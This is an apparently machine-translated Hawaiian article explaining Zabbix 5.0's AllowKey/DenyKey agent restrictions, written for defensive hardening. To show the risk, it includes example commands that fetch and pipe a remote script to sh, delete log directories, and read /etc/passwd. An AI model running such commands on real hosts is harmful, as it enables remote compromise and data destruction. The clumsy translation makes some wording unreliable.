Kākoʻo no ka papa inoa ʻeleʻele a me ka papa inoa keʻokeʻo no nā metric ʻaoʻao ʻaoʻao ma Zabbix 5.0

Kākoʻo papa inoa ʻeleʻele a me ka papa inoa keʻokeʻo no nā ana ʻaoʻao ʻāpana

ʻO Tikhon Uskov, Mea Hana Hoʻohui, Zabbix

Nā pilikia palekana ʻikepili

Loaʻa iā Zabbix 5.0 kahi hiʻohiʻona hou e hiki ai iā ʻoe ke hoʻomaikaʻi i ka palekana i nā ʻōnaehana me ka hoʻohana ʻana iā Zabbix Agent a hoʻololi i ka palena kahiko. EnableRemoteCommands.

ʻO ka hoʻomaikaʻi ʻana i ka palekana o nā ʻōnaehana e pili ana i nā mea kūʻai aku ma muli o ka hiki i kahi ʻelele ke hana i ka nui o nā hana weliweli.

• Hiki i ka ʻelele ke hōʻiliʻili kokoke i nā ʻike āpau, me ka ʻike huna a i ʻole nā ​​​​pilikia weliweli, mai nā faila hoʻonohonoho, nā faila log, nā faila ʻōlelo huna, a i ʻole nā ​​faila ʻē aʻe.

No ka laʻana, me ka hoʻohana ʻana i ka pono zabbix_get hiki iā ʻoe ke komo i kahi papa inoa o nā mea hoʻohana, kā lākou home directories, password file, etc.

Ke komo ʻana i ka ʻikepili me ka hoʻohana ʻana i ka pono zabbix_get

PAPA. Hiki ke kiʻi wale ʻia ka ʻikepili inā ua heluhelu ka luna i nā ʻae i ka faila pili. Akā, no ka laʻana, ka faila /etc/passwd/ hiki ke heluhelu ʻia e nā mea hoʻohana a pau.

• Hiki i ka ʻelele ke hoʻokō i nā kauoha hiki ke pilikia. No ka laʻana, kī *system.run[]** hiki iā ʻoe ke hoʻokō i nā kauoha mamao ma nā node pūnaewele, me ka holo ʻana i nā palapala mai ka pūnaewele pūnaewele Zabbix e hoʻokō pū ana i nā kauoha ma ka ʻaoʻao ʻelele.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

• Ma Linux, holo ka luna ma ke ʻano maʻamau me ka ʻole o nā pono kumu, ʻoiai ma Windows e holo ʻo ia ma ke ʻano he lawelawe ʻo System a loaʻa iā ia ke komo ʻole i ka ʻōnaehana faila. No laila, inā ʻaʻohe hoʻololi i nā palena ʻo Zabbix Agent ma hope o ka hoʻokomo ʻana, hiki i ka luna ke komo i ke kākau inoa, ʻōnaehana faila a hiki ke hoʻokō i nā nīnau WMI.

I nā mana mua o ka palena EnableRemoteCommands=0 ʻae wale ʻia e hoʻopau i nā metric me ke kī *system.run[]** a me ka holo ʻana i nā palapala mai ka ʻaoʻao pūnaewele, akā ʻaʻohe ala e kaohi ai i ke komo ʻana i nā faila pākahi, ʻae a hoʻopau paha i nā kī pākahi i hoʻokomo ʻia me ka ʻelele, a i ʻole e kaupalena i ka hoʻohana ʻana i nā ʻāpana pākahi.

Ke hoʻohana nei i ka ʻāpana EnableRemoteCommand i nā mana mua o Zabbix

AllowKey/DenyKey

Kōkua ʻo Zabbix 5.0 i ka pale ʻana i kēlā ʻano ʻae ʻole ma o ka hāʻawi ʻana i nā papa inoa keʻokeʻo a me nā papa inoa ʻeleʻele no ka ʻae ʻana a me ka hōʻole ʻana i nā metric ma ka ʻaoʻao luna.

Ma Zabbix 5.0 nā kī āpau, me *system.run[]** ua hoʻohana ʻia, a ua hoʻohui ʻia ʻelua mau koho hoʻonohonoho luna hou:

AllowKey= - ʻae ʻia nā mākaʻikaʻi;

DenyKey= - nā māka pāpā ʻia;

Aia kahi kumu inoa nui me nā ʻāpana e hoʻohana ana i nā metacharacter (*).

ʻO nā kī AllowKey a me DenyKey e ʻae iā ʻoe e ʻae a hōʻole paha i nā ana hoʻokahi e pili ana i kahi kumu kikoʻī. ʻAʻole like me nā ʻāpana hoʻonohonoho ʻē aʻe, ʻaʻole i kaupalena ʻia ka helu o nā ʻāpana AllowKey/DenyKey. ʻAe kēia iā ʻoe e wehewehe pono i ka mea e hiki ai i ka mea hana ke hana i loko o ka ʻōnaehana ma o ka hana ʻana i kahi kumulāʻau o nā loiloi - nā kī hiki ke hoʻokō ʻia, kahi i hana nui ai ke kauoha i kākau ʻia ai.

Ke kaʻina o nā lula

Hoʻopaʻa ʻia nā lula ma ke ʻano i hoʻokomo ʻia i loko o ka faila hoʻonohonoho. Hoʻopaʻa ʻia ke kī e like me nā lula ma mua o ka pāʻani mua, a i ka wā e pili ana ke kī o ka mea ʻikepili i ke kumu, ʻae ʻia a hōʻole ʻia. Ma hope o kēia, pau ka nānā ʻana i ka lula a nānā ʻole ʻia nā kī i koe.

No laila, inā pili kekahi mea i ka lula ʻae a me ke kānāwai hōʻole, e hilinaʻi ka hopena i ka lula mua i ka faila hoʻonohonoho.

2 mau lula like ʻole me ke ʻano like a me ke kī vfs.file.size[/tmp/file]

ʻO ke kauoha o ka hoʻohana ʻana i nā kī AllowKey/DenyKey:

1. rula pololei,
2. nā lula maʻamau,
3. rula kapu.

No ka laʻana, inā makemake ʻoe i ke komo ʻana i nā faila i loko o kekahi waihona, pono ʻoe e ʻae mua i ke komo ʻana iā lākou, a laila hōʻole i nā mea āpau ʻaʻole i hāʻule i loko o nā ʻae i hoʻokumu ʻia. Inā hoʻohana mua ʻia ka lula hōʻole, e hōʻole ʻia ke komo ʻana i ka waihona.

Kakau pololei

Inā pono ʻoe e ʻae i 2 mau pono e holo ma o *system.run[]**, a e kuhikuhi mua ʻia ka lula hōʻole, ʻaʻole e hoʻokuʻu ʻia nā pono hana, no ka mea e pili mau ke kumu mua i kekahi kī, a e nānā ʻole ʻia nā lula ma hope.

Ke kaʻina hewa

Nā hiʻohiʻona

Nā kulekele kumu

ʻO ka laʻana he hōʻike me nā kāleka. Hoʻohālikelike ka metacharacter (*) i kekahi helu o nā huaʻōlelo ma kahi kūlana kikoʻī. Hiki ke hoʻohana ʻia nā metacharacters ma ka inoa kī a ma nā ʻāpana. No ka laʻana, hiki iā ʻoe ke wehewehe pono i ka ʻāpana mua me ka kikokikona, a e kuhikuhi i ka mea ma hope e like me ka wildcard.

Pono e hoʻopaʻa ʻia nā ʻāpana i loko o nā bracket square [].

• system.run[* - hewa
• vfs.file*.txt] - hewa
• vfs.file.*[*] - akau

Nā laʻana o ka hoʻohana ʻana i ka wildcard.

1. Ma ka inoa kī a ma ka palena. I kēia hihia, ʻaʻole pili ke kī i kahi kī like ʻole i loaʻa kahi ʻāpana, no ka mea ma ke ʻano i hōʻike ʻia e makemake mākou e loaʻa i kahi hopena o ka inoa kī a me kekahi mau ʻāpana.
2. Inā ʻaʻole hoʻohana ke kumu i nā bracket square, ʻae ke kumu i nā kī āpau ʻaʻole i loaʻa nā ʻāpana a hōʻole i nā kī āpau i loaʻa ka ʻāpana i kuhikuhi ʻia.
3. Inā kākau piha ʻia ke kī a hōʻike ʻia nā palena ma ke ʻano he wildcard, e kūlike ia i kekahi kī like me nā ʻāpana a ʻaʻole e kūlike i ke kī me ka ʻole o nā bracket square, ʻo ia hoʻi e ʻae ʻia a hōʻole ʻia.

Nā lula no ka hoʻopiha ʻana i nā ʻāpana.

• Inā hoʻohana ʻia kahi kī me nā ʻāpana, pono e kuhikuhi ʻia nā ʻāpana i ka faila hoʻonohonoho. Pono e kuhikuhi ʻia nā ʻāpana ma ke ʻano he metacharacter. Pono e hōʻole pono i ke komo ʻana i kekahi faila a e noʻonoʻo i ka ʻike e hiki ai i ka metric ke hāʻawi ma lalo o nā huaʻōlelo like ʻole - me nā ʻāpana ʻole.

Nā hiʻohiʻona o nā kī kākau me nā ʻāpana

• Inā hōʻike ʻia kahi kī me nā ʻāpana, akā he koho nā ʻāpana a hoʻopaʻa ʻia ma ke ʻano he metacharacter, e hoʻoholo ʻia kahi kī me ka ʻole. No ka laʻana, inā makemake ʻoe e hoʻopau i ka loaʻa ʻana o ka ʻike e pili ana i ka ukana ma ka CPU a e kuhikuhi i ke kī ʻo system.cpu.load [*] pono e hoʻopau ʻia, mai poina e hoʻihoʻi ke kī me ka ʻole o ka hoʻohālikelike ʻana i ka waiwai ukana maʻamau.

Nā lula no ka hoʻopiha ʻana i nā ʻāpana

Nā Nānā

hoʻoponopono

• ʻAʻole hiki ke hoʻololi ʻia kekahi mau lula e ka mea hoʻohana, no ka laʻana, nā lula ʻike a i ʻole nā ​​lula hoʻopaʻa inoa ʻokoʻa. ʻAʻole pili nā lula ʻo AllowKey/DenyKey i kēia mau ʻāpana:
  - HostnameItem
  - HostMetadataItem
  - HostInterfaceItem

PAPA. Inā hoʻopau ka luna hoʻomalu i kahi kī, i ka wā e nīnau ʻia ai, ʻaʻole hāʻawi ʻo Zabbix i ka ʻike e pili ana i ke kumu e hāʻule ai ka metric a i ʻole ke kī i ka ' waeʻano.AOLE I KOKUA'. ʻAʻole hōʻike ʻia ka ʻike e pili ana i nā pāpā i ka hoʻokō ʻana i nā kauoha mamao ma nā faila log agent. No nā kumu palekana kēia, akā hiki ke paʻakikī i ka debugging inā hāʻule nā ​​metric i kahi ʻāpana i kākoʻo ʻole ʻia no kekahi kumu.

• ʻAʻole pono ʻoe e hilinaʻi i kekahi kauoha kikoʻī no ka hoʻopili ʻana i nā faila hoʻonohonoho waho (no ka laʻana, ma ke ʻano pīʻāpā).

Nā pono laina kauoha

Ma hope o ka hoʻonohonoho ʻana i nā lula, pono ʻoe e hōʻoia ua hoʻonohonoho pono ʻia nā mea āpau.

Hiki iā ʻoe ke hoʻohana i kekahi o nā koho ʻekolu:

• Hoʻohui i kahi metric iā Zabbix.
• Hoao me zabbix_agentd. ʻO Zabbix agent me kahi koho -paʻi (-p) hōʻike i nā kī āpau (i ʻae ʻia e ka paʻamau) koe nā mea i ʻae ʻole ʻia e ka hoʻonohonoho. A me ke koho -hōʻike (-t) no ka mea, e hoʻi mai ke kī kapu 'Kākoʻo 'ikamu kī'.
• Hoao me zabbix_get. Mea hoohana zabbix_get me ke koho -k e hoʻi 'ZBX_NOTSUPPORTED: ʻAʻole ʻike ʻia ke ana'.

ʻAe a hōʻole paha

Hiki iā ʻoe ke hōʻole i ke komo ʻana i kahi faila a hōʻoia, no ka laʻana, me ka hoʻohana ʻana i ka pono zabbix_getua hōʻole ʻia ke komo ʻana i ka faila.

**

PAPA. ʻAʻole mālama ʻia nā huaʻōlelo ma ka ʻāpana.

I kēia hihia, hiki ke ʻae ʻia ke komo ʻana i ia faila ma ke ala ʻē aʻe. No ka laʻana, inā alakaʻi kahi symlink iā ia.

Manaʻo ʻia e nānā i nā koho like ʻole no ka hoʻopili ʻana i nā lula i ʻōlelo ʻia, a e noʻonoʻo pū i nā hiki ke pale i nā pāpā.

Nā nīnau a me nā pane

Kou nīnau. No ke aha i koho ʻia ai kahi ʻano paʻakikī me kāna ʻōlelo ponoʻī e wehewehe i nā lula, nā ʻae a me nā pāpā? No ke aha i hiki ʻole ai ke hoʻohana, no ka laʻana, nā ʻōlelo maʻamau a Zabbix e hoʻohana ai?

ʻO ka pane. He pilikia hoʻokō regex kēia no ka mea he hoʻokahi wale nō ʻelele a nānā ʻo ia i ka nui o nā metric. He hana koʻikoʻi ʻo Regex a ʻaʻole hiki iā mākou ke nānā i nā kaukani metric ma kēia ala. Wildcards - he hoʻonā ākea, hoʻohana nui a maʻalahi.

Kou nīnau. ʻAʻole anei i hoʻokomo ʻia nā faila Include ma ka papa pīʻāpā?

ʻO ka pane. E like me kaʻu i ʻike ai, aneane hiki ʻole ke wānana i ke ʻano o nā lula e hoʻopili ʻia inā ʻoe e hoʻolaha i nā lula ma nā faila like ʻole. Manaʻo wau e hōʻiliʻili i nā lula ʻo AllowKey/DenyKey i hoʻokahi waihona Include, no ka mea pili lākou i kekahi i kekahi, a me kēia faila..

Kou nīnau. Ma Zabbix 5.0 ke koho 'EnableRemoteCommands=' ua nalo mai ka waihona hoʻonohonoho, a ʻo AllowKey/DenyKey wale nō ke loaʻa?

Pane. ʻAe pololei kēlā.

Nā mea hou aku!

Source: www.habr.com